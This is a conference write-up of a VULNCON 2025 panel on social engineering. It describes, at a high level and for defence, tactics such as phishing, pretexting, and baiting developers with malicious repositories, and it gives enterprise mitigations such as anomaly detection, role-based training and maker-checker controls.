The Human Element: Decoding Social Engineering in Offensive Security

Technology advances at a breakneck pace, yet the most critical vulnerability in any enterprise remains the same: the human being. Often dubbed the "eighth layer" of the OSI model, human psychology is continually exploited by sophisticated adversaries. At the VULNCON 2025 CXO Panel, industry leaders Rex Pushparaj, Navdeep Aggarwal, and Anand Shrivastava, moderated by Divakar Prayaga, dissected the modern landscape of social engineering, revealing how attackers are bypassing technical controls by targeting the human element.

Here is a deep dive into the evolving challenges and the strategic mitigations enterprises must adopt to secure their organisations.

The Evolving Threat Landscape

Social engineering is a decades-old practice, but its tactics have evolved dramatically to bypass modern defences. Attackers no longer rely solely on poorly worded phishing emails. Today, they leverage AI to craft impeccable, customised messages and exploit region-specific features, such as spoofing alphanumeric SMS sender IDs to seamlessly mimic legitimate organisations, like banks.

Furthermore, modern social engineering often converges with physical and infrastructure vulnerabilities. For instance, in a recent sophisticated attack in Singapore, adversaries sat outside a corporate compound, compromised external Wi-Fi and CCTV cameras, and observed employee keystrokes to intercept OTPs in plain sight, resulting in a $1 million loss. In another instance involving the supply chain, adversaries successfully routed a package and sensitive materials to the US instead of South Africa by compromising inactive Active Directory accounts and activating them solely at the exact moment of approval.

Cultural Vulnerabilities and High-Risk Sectors

Cultural tendencies significantly impact an organization's susceptibility to social engineering. A deep-seated culture of trust makes individuals more willing to share personal information, often prioritizing trust over privacy and failing to verify the requester's intent.

1. The Healthcare Sector
   In healthcare, the intense focus on patient survival creates an ecosystem of extreme vulnerability. Patients and families willingly hand over sensitive Personally Identifiable Information (PII), such as Aadhaar numbers and OTPs, without validating why diagnostics labs or hospital receptionists need them. Attackers exploit this by sending fake diagnostic reports via WhatsApp, immediately compromising the devices of anxious patients who click the malicious links.
2. Human Resources (HR) & Sales
   HR and sales are frequently targeted as "low-hanging fruit". Unlike developers, HR professionals are mandated by their roles to engage with external communications, open external attachments such as resumes, and uphold a prominent public profile on platforms like LinkedIn. Despite holding the "crown jewels" of the organisation - including both PII and Protected Health Information (PHI) for all current and past employees - HR departments rarely receive the same level of security investment as product development teams.

Advanced Pretexting and Baiting Techniques

Attackers are highly skilled at pretexting—fabricating scenarios that make logical, everyday sense to the target. For example, adversaries target new hires by posing as IT support, exploiting the fact that default corporate credentials (like variations of "welcome@123") are often still in widespread use.

• Exploiting Greed: Baiting techniques have matured significantly. Attackers target developers by posing as job seekers and sharing malicious GitHub repositories; the promise of a lucrative employee referral bonus entices the target to clone the repository or open a Visual Studio Code project. Just opening the project can grant the attacker full access to AWS credentials and the employee's home directory.
• Exploiting Ego: Attackers also provoke emotional responses by criticising an employee's work. By attacking a developer's code or an HR manager's hiring practices, attackers trigger the target's ego to elicit a rapid, unguarded response.
• Strategic Defences for the Enterprise: Technology alone cannot solve the social engineering problem, as no technical control can prevent an employee from willingly authorising a fraudulent transfer if they believe the request is legitimate. Securing the enterprise requires a holistic, process-driven approach:
• Behavioural Anomaly Detection: Organisations must profile normal user behaviour to detect deviations. For instance, if an HR employee—who typically uses Word and Excel—suddenly executes a PowerShell script, the system should automatically lock the account pending investigation.
• Outbound Traffic Visibility: While most organisations monitor incoming connections, monitoring and prompting users about anomalous outgoing connections can provide a critical friction point. Forcing a user to explicitly approve an outbound connection to an unknown domain can disrupt the attack chain.
• Role-Based Awareness Training: Generic compliance training is ineffective and leaves organisations exposed. Awareness programs must be highly customised based on the specific operational threats faced by different roles, such as the distinct threat models for HR teams versus developers.
• Gamification and Positive Reinforcement: Instead of only punishing users who fail phishing simulations, organisations should reward those who successfully identify threats. A well-tuned reward system incentivises proactive threat hunting among employees, turning them into active defenders.
• Robust Process Controls: Implementing strict Maker-Checker processes, segregation of duties, and rigorous role-based access control (RBAC) ensures that no single compromised human can authorise critical transactions, approve shipments, or merge sensitive codes without secondary validation.

Conclusion